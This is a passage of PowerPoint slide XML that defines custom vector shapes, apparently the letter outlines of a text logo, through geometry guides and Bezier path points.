                    <a:gd name="T2" fmla="*/ 0 w 19"/>
                    <a:gd name="T3" fmla="*/ 0 h 24"/>
                    <a:gd name="T4" fmla="*/ 0 w 19"/>
                    <a:gd name="T5" fmla="*/ 0 h 24"/>
                    <a:gd name="T6" fmla="*/ 16 w 19"/>
                    <a:gd name="T7" fmla="*/ 18 h 24"/>
                    <a:gd name="T8" fmla="*/ 16 w 19"/>
                    <a:gd name="T9" fmla="*/ 0 h 24"/>
                    <a:gd name="T10" fmla="*/ 19 w 19"/>
                    <a:gd name="T11" fmla="*/ 0 h 24"/>
                    <a:gd name="T12" fmla="*/ 19 w 19"/>
                    <a:gd name="T13" fmla="*/ 24 h 24"/>
                    <a:gd name="T14" fmla="*/ 18 w 19"/>
                    <a:gd name="T15" fmla="*/ 24 h 24"/>
                    <a:gd name="T16" fmla="*/ 3 w 19"/>
                    <a:gd name="T17" fmla="*/ 6 h 24"/>
                    <a:gd name="T18" fmla="*/ 3 w 19"/>
                    <a:gd name="T19" fmla="*/ 24 h 24"/>
                    <a:gd name="T20" fmla="*/ 0 w 19"/>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4">
                      <a:moveTo>
                        <a:pt x="0" y="24"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="16" y="18"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="16" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="19" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="19" y="24"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="18" y="24"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="3" y="6"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="3" y="24"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="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306"/>
                <p:cNvSpPr>
                  <a:spLocks noEditPoints="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="9956800" y="4841876"/>
                  <a:ext cx="60325" cy="71438"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 26"/>
                    <a:gd name="T1" fmla="*/ 31 h 31"/>
                    <a:gd name="T2" fmla="*/ 0 w 26"/>
                    <a:gd name="T3" fmla="*/ 0 h 31"/>
                    <a:gd name="T4" fmla="*/ 7 w 26"/>
                    <a:gd name="T5" fmla="*/ 0 h 31"/>
                    <a:gd name="T6" fmla="*/ 16 w 26"/>
                    <a:gd name="T7" fmla="*/ 1 h 31"/>
                    <a:gd name="T8" fmla="*/ 23 w 26"/>
                    <a:gd name="T9" fmla="*/ 7 h 31"/>
                    <a:gd name="T10" fmla="*/ 26 w 26"/>
                    <a:gd name="T11" fmla="*/ 16 h 31"/>
                    <a:gd name="T12" fmla="*/ 24 w 26"/>
                    <a:gd name="T13" fmla="*/ 24 h 31"/>
                    <a:gd name="T14" fmla="*/ 19 w 26"/>
                    <a:gd name="T15" fmla="*/ 29 h 31"/>
                    <a:gd name="T16" fmla="*/ 10 w 26"/>
                    <a:gd name="T17" fmla="*/ 31 h 31"/>
                    <a:gd name="T18" fmla="*/ 0 w 26"/>
                    <a:gd name="T19" fmla="*/ 31 h 31"/>
                    <a:gd name="T20" fmla="*/ 3 w 26"/>
                    <a:gd name="T21" fmla="*/ 28 h 31"/>
                    <a:gd name="T22" fmla="*/ 7 w 26"/>
                    <a:gd name="T23" fmla="*/ 28 h 31"/>
                    <a:gd name="T24" fmla="*/ 15 w 26"/>
                    <a:gd name="T25" fmla="*/ 27 h 31"/>
                    <a:gd name="T26" fmla="*/ 21 w 26"/>
                    <a:gd name="T27" fmla="*/ 23 h 31"/>
                    <a:gd name="T28" fmla="*/ 23 w 26"/>
                    <a:gd name="T29" fmla="*/ 16 h 31"/>
                    <a:gd name="T30" fmla="*/ 21 w 26"/>
                    <a:gd name="T31" fmla="*/ 8 h 31"/>
                    <a:gd name="T32" fmla="*/ 15 w 26"/>
                    <a:gd name="T33" fmla="*/ 4 h 31"/>
                    <a:gd name="T34" fmla="*/ 5 w 26"/>
                    <a:gd name="T35" fmla="*/ 3 h 31"/>
                    <a:gd name="T36" fmla="*/ 3 w 26"/>
                    <a:gd name="T37" fmla="*/ 3 h 31"/>
                    <a:gd name="T38" fmla="*/ 3 w 26"/>
                    <a:gd name="T39" fmla="*/ 2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31">
                      <a:moveTo>
                        <a:pt x="0" y="31"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="0"/>
                        <a:pt x="0" y="0"/>
                        <a:pt x="0" y="0"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="7" y="0"/>
                        <a:pt x="7" y="0"/>
                        <a:pt x="7" y="0"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="11" y="0"/>
                        <a:pt x="14" y="0"/>
                        <a:pt x="16" y="1"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="19" y="2"/>
                        <a:pt x="22" y="4"/>
                        <a:pt x="23" y="7"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="25" y="9"/>
                        <a:pt x="26" y="12"/>
                        <a:pt x="26" y="16"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="26" y="19"/>
                        <a:pt x="25" y="22"/>
                        <a:pt x="24" y="24"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="23" y="26"/>
                        <a:pt x="21" y="28"/>
                        <a:pt x="19" y="29"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="17" y="30"/>
                        <a:pt x="14" y="31"/>
                        <a:pt x="10" y="31"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="0" y="31"/>
                      </a:lnTo>
                      <a:close/>
                      <a:moveTo>
                        <a:pt x="3" y="28"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="7" y="28"/>
                        <a:pt x="7" y="28"/>
                        <a:pt x="7" y="28"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="11" y="28"/>
                        <a:pt x="14" y="28"/>
                        <a:pt x="15" y="27"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="18" y="26"/>
                        <a:pt x="20" y="25"/>
                        <a:pt x="21" y="23"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="22" y="21"/>
                        <a:pt x="23" y="19"/>
                        <a:pt x="23" y="16"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="23" y="13"/>
                        <a:pt x="22" y="10"/>
                        <a:pt x="21" y="8"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="19" y="6"/>
                        <a:pt x="17" y="5"/>
                        <a:pt x="15" y="4"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="13" y="3"/>
                        <a:pt x="10" y="3"/>
                        <a:pt x="5" y="3"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3" y="3"/>
                        <a:pt x="3" y="3"/>
                        <a:pt x="3" y="3"/>
                      </a:cubicBezTo>
                      <a:lnTo>
                        <a:pt x="3"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307"/>
                <p:cNvSpPr>
                  <a:spLocks noEditPoints="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="10028238" y="4840288"/>
                  <a:ext cx="74613" cy="73025"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 15 w 32"/>
                    <a:gd name="T1" fmla="*/ 0 h 32"/>
                    <a:gd name="T2" fmla="*/ 27 w 32"/>
                    <a:gd name="T3" fmla="*/ 5 h 32"/>
                    <a:gd name="T4" fmla="*/ 32 w 32"/>
                    <a:gd name="T5" fmla="*/ 16 h 32"/>
                    <a:gd name="T6" fmla="*/ 27 w 32"/>
                    <a:gd name="T7" fmla="*/ 28 h 32"/>
                    <a:gd name="T8" fmla="*/ 16 w 32"/>
                    <a:gd name="T9" fmla="*/ 32 h 32"/>
                    <a:gd name="T10" fmla="*/ 4 w 32"/>
                    <a:gd name="T11" fmla="*/ 28 h 32"/>
                    <a:gd name="T12" fmla="*/ 0 w 32"/>
                    <a:gd name="T13" fmla="*/ 17 h 32"/>
                    <a:gd name="T14" fmla="*/ 2 w 32"/>
                    <a:gd name="T15" fmla="*/ 8 h 32"/>
                    <a:gd name="T16" fmla="*/ 7 w 32"/>
                    <a:gd name="T17" fmla="*/ 2 h 32"/>
                    <a:gd name="T18" fmla="*/ 15 w 32"/>
                    <a:gd name="T19" fmla="*/ 0 h 32"/>
                    <a:gd name="T20" fmla="*/ 16 w 32"/>
                    <a:gd name="T21" fmla="*/ 3 h 32"/>
                    <a:gd name="T22" fmla="*/ 9 w 32"/>
                    <a:gd name="T23" fmla="*/ 5 h 32"/>
                    <a:gd name="T24" fmla="*/ 4 w 32"/>
                    <a:gd name="T25" fmla="*/ 10 h 32"/>
                    <a:gd name="T26" fmla="*/ 3 w 32"/>
                    <a:gd name="T27" fmla="*/ 16 h 32"/>
                    <a:gd name="T28" fmla="*/ 6 w 32"/>
                    <a:gd name="T29" fmla="*/ 26 h 32"/>
                    <a:gd name="T30" fmla="*/ 16 w 32"/>
                    <a:gd name="T31" fmla="*/ 29 h 32"/>
                    <a:gd name="T32" fmla="*/ 22 w 32"/>
                    <a:gd name="T33" fmla="*/ 28 h 32"/>
                    <a:gd name="T34" fmla="*/ 27 w 32"/>
                    <a:gd name="T35" fmla="*/ 23 h 32"/>
                    <a:gd name="T36" fmla="*/ 29 w 32"/>
                    <a:gd name="T37" fmla="*/ 16 h 32"/>
                    <a:gd name="T38" fmla="*/ 27 w 32"/>
                    <a:gd name="T39" fmla="*/ 10 h 32"/>
                    <a:gd name="T40" fmla="*/ 22 w 32"/>
                    <a:gd name="T41" fmla="*/ 5 h 32"/>
                    <a:gd name="T42" fmla="*/ 16 w 32"/>
                    <a:gd name="T43"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15" y="0"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="20" y="0"/>
                        <a:pt x="24" y="2"/>
                        <a:pt x="27" y="5"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="30" y="8"/>
                        <a:pt x="32" y="12"/>
                        <a:pt x="32" y="16"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="32" y="21"/>
                        <a:pt x="30" y="25"/>
                        <a:pt x="27" y="28"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="24" y="31"/>
                        <a:pt x="20" y="32"/>
                        <a:pt x="16" y="32"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="11" y="32"/>
                        <a:pt x="7" y="31"/>
                        <a:pt x="4" y="28"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="1" y="25"/>
                        <a:pt x="0" y="21"/>
                        <a:pt x="0" y="17"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="14"/>
                        <a:pt x="0" y="11"/>
                        <a:pt x="2" y="8"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3" y="6"/>
                        <a:pt x="5" y="4"/>
                        <a:pt x="7" y="2"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="10" y="1"/>
                        <a:pt x="13" y="0"/>
                        <a:pt x="15" y="0"/>
                      </a:cubicBezTo>
                      <a:close/>
                      <a:moveTo>
                        <a:pt x="16" y="3"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="13" y="3"/>
                        <a:pt x="11" y="4"/>
                        <a:pt x="9" y="5"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="7" y="6"/>
                        <a:pt x="6" y="8"/>
                        <a:pt x="4" y="10"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3" y="12"/>
                        <a:pt x="3" y="14"/>
                        <a:pt x="3" y="16"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3" y="20"/>
                        <a:pt x="4" y="23"/>
                        <a:pt x="6" y="26"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="9" y="28"/>
                        <a:pt x="12" y="29"/>
                        <a:pt x="16" y="29"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="18" y="29"/>
                        <a:pt x="20" y="29"/>
                        <a:pt x="22" y="28"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="24" y="27"/>
                        <a:pt x="26" y="25"/>
                        <a:pt x="27" y="23"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="28" y="21"/>
                        <a:pt x="29" y="19"/>
                        <a:pt x="29" y="16"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="29" y="14"/>
                        <a:pt x="28" y="12"/>
                        <a:pt x="27" y="10"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="26" y="8"/>
                        <a:pt x="24" y="6"/>
                        <a:pt x="22" y="5"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="20" y="4"/>
                        <a:pt x="18" y="3"/>
                        <a:pt x="1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308"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="10112375" y="4840288"/>
                  <a:ext cx="68263" cy="73025"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 30 w 30"/>
                    <a:gd name="T1" fmla="*/ 7 h 32"/>
                    <a:gd name="T2" fmla="*/ 28 w 30"/>
                    <a:gd name="T3" fmla="*/ 9 h 32"/>
                    <a:gd name="T4" fmla="*/ 23 w 30"/>
                    <a:gd name="T5" fmla="*/ 5 h 32"/>
                    <a:gd name="T6" fmla="*/ 17 w 30"/>
                    <a:gd name="T7" fmla="*/ 3 h 32"/>
                    <a:gd name="T8" fmla="*/ 10 w 30"/>
                    <a:gd name="T9" fmla="*/ 5 h 32"/>
                    <a:gd name="T10" fmla="*/ 5 w 30"/>
                    <a:gd name="T11" fmla="*/ 10 h 32"/>
                    <a:gd name="T12" fmla="*/ 4 w 30"/>
                    <a:gd name="T13" fmla="*/ 16 h 32"/>
                    <a:gd name="T14" fmla="*/ 8 w 30"/>
                    <a:gd name="T15" fmla="*/ 26 h 32"/>
                    <a:gd name="T16" fmla="*/ 17 w 30"/>
                    <a:gd name="T17" fmla="*/ 30 h 32"/>
                    <a:gd name="T18" fmla="*/ 28 w 30"/>
                    <a:gd name="T19" fmla="*/ 25 h 32"/>
                    <a:gd name="T20" fmla="*/ 30 w 30"/>
                    <a:gd name="T21" fmla="*/ 26 h 32"/>
                    <a:gd name="T22" fmla="*/ 25 w 30"/>
                    <a:gd name="T23" fmla="*/ 31 h 32"/>
                    <a:gd name="T24" fmla="*/ 17 w 30"/>
                    <a:gd name="T25" fmla="*/ 32 h 32"/>
                    <a:gd name="T26" fmla="*/ 4 w 30"/>
                    <a:gd name="T27" fmla="*/ 27 h 32"/>
                    <a:gd name="T28" fmla="*/ 0 w 30"/>
                    <a:gd name="T29" fmla="*/ 16 h 32"/>
                    <a:gd name="T30" fmla="*/ 5 w 30"/>
                    <a:gd name="T31" fmla="*/ 5 h 32"/>
                    <a:gd name="T32" fmla="*/ 17 w 30"/>
                    <a:gd name="T33" fmla="*/ 0 h 32"/>
                    <a:gd name="T34" fmla="*/ 25 w 30"/>
                    <a:gd name="T35" fmla="*/ 2 h 32"/>
                    <a:gd name="T36" fmla="*/ 30 w 30"/>
                    <a:gd name="T37"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32">
                      <a:moveTo>
                        <a:pt x="30" y="7"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="28" y="9"/>
                        <a:pt x="28" y="9"/>
                        <a:pt x="28" y="9"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="27" y="7"/>
                        <a:pt x="25" y="6"/>
                        <a:pt x="23" y="5"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="21" y="4"/>
                        <a:pt x="19" y="3"/>
                        <a:pt x="17" y="3"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="15" y="3"/>
                        <a:pt x="12" y="4"/>
                        <a:pt x="10" y="5"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="8" y="6"/>
                        <a:pt x="7" y="8"/>
                        <a:pt x="5" y="10"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="4" y="12"/>
                        <a:pt x="4" y="14"/>
                        <a:pt x="4" y="16"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="4" y="20"/>
                        <a:pt x="5" y="23"/>
                        <a:pt x="8" y="26"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="10" y="28"/>
                        <a:pt x="13" y="30"/>
                        <a:pt x="17" y="30"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="22" y="30"/>
                        <a:pt x="25" y="28"/>
                        <a:pt x="28" y="25"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="30" y="26"/>
                        <a:pt x="30" y="26"/>
                        <a:pt x="30" y="26"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="29" y="28"/>
                        <a:pt x="27" y="30"/>
                        <a:pt x="25" y="31"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="22" y="32"/>
                        <a:pt x="20" y="32"/>
                        <a:pt x="17" y="32"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="12" y="32"/>
                        <a:pt x="7" y="31"/>
                        <a:pt x="4" y="27"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="2" y="24"/>
                        <a:pt x="0" y="20"/>
                        <a:pt x="0" y="16"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="12"/>
                        <a:pt x="2" y="8"/>
                        <a:pt x="5" y="5"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="8" y="2"/>
                        <a:pt x="12" y="0"/>
                        <a:pt x="17" y="0"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="20" y="0"/>
                        <a:pt x="22" y="1"/>
                        <a:pt x="25" y="2"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="27" y="3"/>
                        <a:pt x="29" y="5"/>
                        <a:pt x="3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309"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="10196513" y="4841876"/>
                  <a:ext cx="46038" cy="71438"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 20"/>
                    <a:gd name="T1" fmla="*/ 0 h 31"/>
                    <a:gd name="T2" fmla="*/ 3 w 20"/>
                    <a:gd name="T3" fmla="*/ 0 h 31"/>
                    <a:gd name="T4" fmla="*/ 3 w 20"/>
                    <a:gd name="T5" fmla="*/ 19 h 31"/>
                    <a:gd name="T6" fmla="*/ 3 w 20"/>
                    <a:gd name="T7" fmla="*/ 23 h 31"/>
                    <a:gd name="T8" fmla="*/ 4 w 20"/>
                    <a:gd name="T9" fmla="*/ 26 h 31"/>
                    <a:gd name="T10" fmla="*/ 6 w 20"/>
                    <a:gd name="T11" fmla="*/ 28 h 31"/>
                    <a:gd name="T12" fmla="*/ 10 w 20"/>
                    <a:gd name="T13" fmla="*/ 29 h 31"/>
                    <a:gd name="T14" fmla="*/ 13 w 20"/>
                    <a:gd name="T15" fmla="*/ 28 h 31"/>
                    <a:gd name="T16" fmla="*/ 15 w 20"/>
                    <a:gd name="T17" fmla="*/ 26 h 31"/>
                    <a:gd name="T18" fmla="*/ 17 w 20"/>
                    <a:gd name="T19" fmla="*/ 23 h 31"/>
                    <a:gd name="T20" fmla="*/ 17 w 20"/>
                    <a:gd name="T21" fmla="*/ 19 h 31"/>
                    <a:gd name="T22" fmla="*/ 17 w 20"/>
                    <a:gd name="T23" fmla="*/ 0 h 31"/>
                    <a:gd name="T24" fmla="*/ 20 w 20"/>
                    <a:gd name="T25" fmla="*/ 0 h 31"/>
                    <a:gd name="T26" fmla="*/ 20 w 20"/>
                    <a:gd name="T27" fmla="*/ 19 h 31"/>
                    <a:gd name="T28" fmla="*/ 19 w 20"/>
                    <a:gd name="T29" fmla="*/ 25 h 31"/>
                    <a:gd name="T30" fmla="*/ 16 w 20"/>
                    <a:gd name="T31" fmla="*/ 30 h 31"/>
                    <a:gd name="T32" fmla="*/ 10 w 20"/>
                    <a:gd name="T33" fmla="*/ 31 h 31"/>
                    <a:gd name="T34" fmla="*/ 4 w 20"/>
                    <a:gd name="T35" fmla="*/ 30 h 31"/>
                    <a:gd name="T36" fmla="*/ 0 w 20"/>
                    <a:gd name="T37" fmla="*/ 25 h 31"/>
                    <a:gd name="T38" fmla="*/ 0 w 20"/>
                    <a:gd name="T39" fmla="*/ 19 h 31"/>
                    <a:gd name="T40" fmla="*/ 0 w 20"/>
                    <a:gd name="T4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31">
                      <a:moveTo>
                        <a:pt x="0" y="0"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="3" y="0"/>
                        <a:pt x="3" y="0"/>
                        <a:pt x="3" y="0"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3" y="19"/>
                        <a:pt x="3" y="19"/>
                        <a:pt x="3" y="19"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3" y="21"/>
                        <a:pt x="3" y="22"/>
                        <a:pt x="3" y="23"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3" y="24"/>
                        <a:pt x="3" y="25"/>
                        <a:pt x="4" y="26"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="4" y="26"/>
                        <a:pt x="5" y="27"/>
                        <a:pt x="6" y="28"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="8" y="28"/>
                        <a:pt x="9" y="29"/>
                        <a:pt x="10" y="29"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="11" y="29"/>
                        <a:pt x="12" y="28"/>
                        <a:pt x="13" y="28"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="14" y="27"/>
                        <a:pt x="15" y="27"/>
                        <a:pt x="15" y="26"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="16" y="25"/>
                        <a:pt x="16" y="24"/>
                        <a:pt x="17" y="23"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="17" y="23"/>
                        <a:pt x="17" y="21"/>
                        <a:pt x="17" y="19"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="17" y="0"/>
                        <a:pt x="17" y="0"/>
                        <a:pt x="17" y="0"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="20" y="0"/>
                        <a:pt x="20" y="0"/>
                        <a:pt x="20" y="0"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="20" y="19"/>
                        <a:pt x="20" y="19"/>
                        <a:pt x="20" y="19"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="20" y="21"/>
                        <a:pt x="20" y="23"/>
                        <a:pt x="19" y="25"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="19" y="27"/>
                        <a:pt x="17" y="28"/>
                        <a:pt x="16" y="30"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="14" y="31"/>
                        <a:pt x="12" y="31"/>
                        <a:pt x="10" y="31"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="8" y="31"/>
                        <a:pt x="5" y="31"/>
                        <a:pt x="4" y="30"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="2" y="28"/>
                        <a:pt x="1" y="27"/>
                        <a:pt x="0" y="25"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="24"/>
                        <a:pt x="0" y="22"/>
                        <a:pt x="0" y="19"/>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310"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="10256838" y="4841876"/>
                  <a:ext cx="80963" cy="71438"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 51"/>
                    <a:gd name="T1" fmla="*/ 45 h 45"/>
                    <a:gd name="T2" fmla="*/ 6 w 51"/>
                    <a:gd name="T3" fmla="*/ 0 h 45"/>
                    <a:gd name="T4" fmla="*/ 7 w 51"/>
                    <a:gd name="T5" fmla="*/ 0 h 45"/>
                    <a:gd name="T6" fmla="*/ 25 w 51"/>
                    <a:gd name="T7" fmla="*/ 37 h 45"/>
                    <a:gd name="T8" fmla="*/ 44 w 51"/>
                    <a:gd name="T9" fmla="*/ 0 h 45"/>
                    <a:gd name="T10" fmla="*/ 44 w 51"/>
                    <a:gd name="T11" fmla="*/ 0 h 45"/>
                    <a:gd name="T12" fmla="*/ 51 w 51"/>
                    <a:gd name="T13" fmla="*/ 45 h 45"/>
                    <a:gd name="T14" fmla="*/ 47 w 51"/>
                    <a:gd name="T15" fmla="*/ 45 h 45"/>
                    <a:gd name="T16" fmla="*/ 42 w 51"/>
                    <a:gd name="T17" fmla="*/ 13 h 45"/>
                    <a:gd name="T18" fmla="*/ 26 w 51"/>
                    <a:gd name="T19" fmla="*/ 45 h 45"/>
                    <a:gd name="T20" fmla="*/ 25 w 51"/>
                    <a:gd name="T21" fmla="*/ 45 h 45"/>
                    <a:gd name="T22" fmla="*/ 9 w 51"/>
                    <a:gd name="T23" fmla="*/ 13 h 45"/>
                    <a:gd name="T24" fmla="*/ 4 w 51"/>
                    <a:gd name="T25" fmla="*/ 45 h 45"/>
                    <a:gd name="T26" fmla="*/ 0 w 51"/>
                    <a:gd name="T27"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45">
                      <a:moveTo>
                        <a:pt x="0" y="45"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="6" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="7" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="25" y="37"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="44" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="44" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="51" y="45"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="47" y="45"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="42" y="13"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="26" y="45"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="25" y="45"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="9" y="13"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="4" y="45"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="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311"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="10352088" y="4841876"/>
                  <a:ext cx="38100" cy="71438"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 24"/>
                    <a:gd name="T1" fmla="*/ 0 h 45"/>
                    <a:gd name="T2" fmla="*/ 24 w 24"/>
                    <a:gd name="T3" fmla="*/ 0 h 45"/>
                    <a:gd name="T4" fmla="*/ 24 w 24"/>
                    <a:gd name="T5" fmla="*/ 4 h 45"/>
                    <a:gd name="T6" fmla="*/ 4 w 24"/>
                    <a:gd name="T7" fmla="*/ 4 h 45"/>
                    <a:gd name="T8" fmla="*/ 4 w 24"/>
                    <a:gd name="T9" fmla="*/ 19 h 45"/>
                    <a:gd name="T10" fmla="*/ 24 w 24"/>
                    <a:gd name="T11" fmla="*/ 19 h 45"/>
                    <a:gd name="T12" fmla="*/ 24 w 24"/>
                    <a:gd name="T13" fmla="*/ 23 h 45"/>
                    <a:gd name="T14" fmla="*/ 4 w 24"/>
                    <a:gd name="T15" fmla="*/ 23 h 45"/>
                    <a:gd name="T16" fmla="*/ 4 w 24"/>
                    <a:gd name="T17" fmla="*/ 41 h 45"/>
                    <a:gd name="T18" fmla="*/ 24 w 24"/>
                    <a:gd name="T19" fmla="*/ 41 h 45"/>
                    <a:gd name="T20" fmla="*/ 24 w 24"/>
